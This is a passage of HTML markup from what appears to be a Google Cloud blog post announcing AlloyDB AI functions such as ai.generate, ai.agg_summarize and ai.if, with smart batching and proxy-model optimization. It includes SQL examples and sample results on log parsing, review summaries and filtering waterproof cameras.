baseline;"&gt;, and the ability to bring the intelligence of foundation models like Gemini directly to your data through &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/evaluate-semantic-queries-ai-operators"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI functions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog post, we discuss the massive breakthroughs in AI function processing alongside a suite of brand-new AI functions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;But first: what exactly are AI functions? They bring Gemini’s world knowledge to your AlloyDB data. Consider the challenge of managing raw user feedback: it’s unstructured, and difficult to parse through. Before this data can be leveraged for search, it may require pre-processing and entity extraction. Rather than maintaining complex custom pipelines for knowledge extraction, you can use Gemini’s generation capabilities directly within AlloyDB to transform raw text into structured, searchable insights. For example, here is how you can use &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ai.generate&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to instantly turn raw feedback into clean, structured JSON (see more examples &lt;/span&gt;&lt;a href="https://medium.com/google-cloud/sql-in-the-gemini-era-bringing-gemini-3-0-to-your-data-with-alloydb-ai-3c5ab775ab31" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;):&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;SELECT\r\n  log_id,\r\n  raw_content,\r\n  -- Use Gemini 3.0 to reason through the raw user feedback and extract structure\r\n  ai.generate(\r\n    model_id =&amp;gt; &amp;#x27;gemini-3.1-pro-preview&amp;#x27;,\r\n    prompt =&amp;gt;\r\n      &amp;#x27;Analyze this raw customer feedback entry. Extract the country, service name, and a 1-sentence summary of the feedback. Return as JSON.&amp;#x27;\r\n      || raw_content) AS structured_feedback\r\nFROM raw_feedback_logs\r\nWHERE user_type &amp;lt;&amp;gt; &amp;#x27;internal&amp;#x27;;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f843a7550a0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Here is a sample result:&lt;/span&gt;&lt;/h3&gt;
&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;log_id&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;raw_content&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;structured_analysis&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2025-12-16 08:00:01 [ERROR] Service: OrderSvc | DbConnectionTimeout: Failed to acquire connection from pool "primary-shard-04" after 5000ms.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;{"errorCode": "DbConnectionTimeout", "serviceName": "OrderSvc", "rootCause": "The service failed to acquire a database connection from the primary shard pool within the 5000ms timeout limit."}&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1002&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2025-12-16 08:05:12 [WARN] Service: IdentityProvider | 401 Unauthorized: Bearer token validation failed for user_id=9942. Signature mismatch.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;{ "error_code": "401", "service_name": "IdentityProvider", "root_cause": "The bearer token validation failed due to a signature mismatch." }&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1003&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2025-12-16 08:12:45 [CRITICAL] Service: AnalyticsEngine | OutOfMemoryError: Java heap space. Allocation of 1.2GB array failed. Heap usage 99%.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;{ "error_code": "OutOfMemoryError", "service_name": "AnalyticsEngine", "root_cause": "The service exhausted available Java heap memory attempting to allocate a 1.2GB array." }&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1004&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2025-12-16 08:25:33 [ERROR] Service: WebFrontEnd | 404 NotFound: Resource /api/v3/users/profile/settings not found. Upstream returned 404.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;{ "error_code": "404", "service_name": "WebFrontEnd", "root_cause": "The requested API resource for user profile settings was not found by the upstream service." }&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1005&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2025-12-16 08:35:50 [WARN] Service: NotificationGateway | GatewayTimeout: External provider "SendGrid" failed to respond within 30s. Retry scheduled.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;{"error_code": "GatewayTimeout", "service_name": "NotificationGateway", "root_cause": "The external provider SendGrid failed to respond within the 30-second timeout limit."}&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;More functions to summarize and analyze sentiment&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our core AI functions —&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ai.generate&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ai.rank&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ai.if&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ai.forecast&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;—are now Generally Available. To learn more about use cases for the first three, refer to this &lt;/span&gt;&lt;a href="https://medium.com/google-cloud/sql-in-the-gemini-era-bringing-gemini-3-0-to-your-data-with-alloydb-ai-3c5ab775ab31" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; blog post&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. To explore the forecast function in action, check out this &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/timesfm-models-in-bigquery-and-alloydb"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;deep dive&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building on this momentum, we have introduced three brand new functions: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ai.summarize&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ai.agg_summarize&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ai.analyze_sentiment&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ai.analyze_sentiment&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: Automatically classifies the emotional tone of text as positive, negative, or neutral.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ai.summarize&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: Condenses lengthy text into its most essential information while preserving the original tone and nuance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ai.agg_summarize&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: An aggregate tool that processes multiple rows within a column to generate a single, unified summary for an entire group (e.g., via a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;GROUP BY&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; clause).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s an example of how to use &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ai.agg_summarize&lt;/code&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;to consolidate a product reviews for  products on a retail website:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT productname, ai.agg_summarize(review) as reviews_summary\r\nGROUP BY productname;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f843a755a90&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here is a sample result of summarized reviews for two gaming console products: &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;productname&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;reviews_summary&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AlphaCore Console &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Users praise the stunning 4K graphics, smooth 120Hz frame rates, and the highly ergonomic controller design.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, several reviews express frustration over the loud cooling fan noise during extended gaming sessions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Overall, it is considered a top-tier console despite minor thermal and noise complaints.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;NeoCore Console &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Customers love the exceptional battery life and vibrant OLED display for handheld gaming on the go.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A significant number of users noted that the UI can feel sluggish and the game library is currently limited.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It represents great value for casual gamers but power users may find the performance lacking.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The power of LLMs on your data: now significantly faster and cheaper&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We now have achieved unprecedented performance and cost breakthroughs in AI function processing. Previously, running a foundation model call for every single row in a massive database introduced cost and latency constraints. We have shattered these barriers by introducing two breakthrough capabilities:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/accelerate-ai-queries"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Smart Batching for AI Functions&lt;/span&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This AI Function Acceleration capability provides intelligent batching of AI function calls for optimal performance and quality. This efficiency is achieved by deduplicating prompt overhead; the LLM's boilerplate instructions are transmitted once per batch rather than repeated across every individual row. A question you may have is - “Why not do this in my own application layer?”. That’s because, AlloyDB intelligently determines the right batch size for optimal results - if you underestimate the batch size, you won’t reap gains for cost and latency, and if you overestimate the batch size, the prompt to the LLM could get bloated and lead to hallucinations, or you could exceed the model's token limits. In addition to calculating the perfect batch size for every request, AlloyDB also handles retries automatically out of the box, ensuring your pipeline stays resilient. We did some testing internally and saw massive gains; for example, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;an up to  2,400x performance boost (processing 10,000 rows/sec) over traditional row-at-a-time LLM calls. This is currently available &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;for the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.if&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.rank&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; functions, with support for additional functions coming in the future.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s look at an example of using Smart Batching / Acceleration with &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.if &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;to solve this use case: Imagine a customer on a gadget retail site searching for a camera that can handle an underwater depth of '60 meters or deeper.' Traditional hybrid search will pull the closest semantic and full-text matches, but it misses the hard constraints of numerical data—meaning it might serve up a camera that works only at 20 meters depth. By using AlloyDB’s &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.if&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;-based intelligent filtering, the database actually understands the nuance of depth and makes the query return products that meet or exceed that 60-meter depth criteria.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Notice how, in the example below, you don’t need to specify the batch size - AlloyDB handles all the optimizations under the hood when using &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.if&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;-- Smart Batching / AI Function Acceleration \r\nSET google_ml_integration.enable_ai_function_acceleration = on;\r\nSELECT productid, productname, category,description\r\nFROM products AS p\r\nWHERE\r\n  ai.if(\r\n    &amp;#x27;Evaluate if the product description indicates that the product is waterproof at depth 60m or deeper. Description:&amp;#x27;\r\n      || description);&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f843a755340&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here is a sample result on a hypothetical gadgets site. Notice how the expanded descriptions of products really match the criteria of working at a depth of 60 meters:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_7d1Ppqp.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/accelerate-queries-optimized-functions"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Optimized AI Functions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: For even greater efficiency, we’ve introduced an optimized mode, starting with &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.if&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. By deploying a small, proxy model that utilizes your embeddings and is trained on your specific LLM outputs, we can process decisions natively within the database. This drastically reduces the need to call the external LLM - and based on some of our internal tests, we saw  staggering gains; for example, up to 100,000 rows processed per second (a 23,000x improvement) and costs slashed by 6,000x (down to 1/10th of a cent). For technical insights on this technique, including when it works best and when not, refer to this &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/more-than-100x-faster-and-cheaper-llm-powered-sql-queries-with-proxy-models?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog post&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. AlloyDB does the following when using optimized &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.if&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Trains a proxy model&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: AlloyDB trains a lightweight proxy model on a sample of your data. This happens in the background when you use the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;PREPARE&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; statement with &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.if&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; function to train the model for optimized queries.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Executes the query&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: When you use the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;EXECUTE&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; statement, AlloyDB uses the trained proxy model to process the query locally.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Falls back to the LLM:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; If the accuracy of the model is low, or if AlloyDB can't find a model, AlloyDB automatically falls back to using the LLM.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s look at the same example of searching for a camera that can handle an underwater depth of 60 meters or deeper using optimized &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.if&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. Here we train a proxy model using the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;PREPARE&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; statement and then &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;EXECUTE&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; the statement thereafter.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;-- Prepare the Optimized Function / Proxy Model\r\nPREPARE waterproof_camera_60m AS\r\nSELECT productid, productname, category, description\r\nFROM products AS p\r\nWHERE\r\n  ai.if(\r\n    &amp;#x27;Evaluate if the product description indicates that the product is waterproof at depth 60m or deeper. Description:&amp;#x27;\r\n      || description,\r\n    description_embedding);\r\n\r\n-- Run the Proxy Model\r\nEXECUTE waterproof_camera_60m;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f843a755760&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You see the same products that truly match the criteria of working at a depth of 60 meters - as shown in the screenshot above. Here’s a tabulated version for the first three products, so you can look at the descriptions more closely: &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;productname&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Pulsetron Action Camera MZ314 &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Conquer your next adventure with this camera. Don't let the elements hold you back; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;dive up to 60 meters deep&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; or withstand rugged trails with its shock-resistant, adventure-ready chassis. Every jump, every turn, every splash is rendered flawlessly smooth with advanced Horizon Lock stabilization, ensuring your footage tells the story with unparalleled fluidity.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Hyperbyte Action Camera LG688&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Capture the world in breathtaking detail, even when the action is at its most intense. This camera packs a formidable 1-inch sensor into a remarkably tough, pocket-sized frame. Shoot stunning 5K video and crystal-clear 20MP stills that rival professional equipment. Dive deeper than ever before with robust &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;waterproofing at 60 meters&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alphasync Action Camera WW897&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This formidable, compact camera shrugs off the elements, while the massive 1-inch sensor translates every breathtaking moment into stunning 5K video and crystal-clear 20MP stills. Conquer any environment – from the deepest dive to the highest peak – thanks to its &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;60 meter waterproofing&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; and revolutionary Horizon Lock, ensuring your footage remains impossibly steady. &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;See it in action!&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Watch how this all comes together in this &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=PxbLWePxt40&amp;amp;feature=youtu.be" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;demo video&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=PxbLWePxt40"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Bring Gemini’s intelligence to AlloyDB using AI functions&lt;/span&gt;
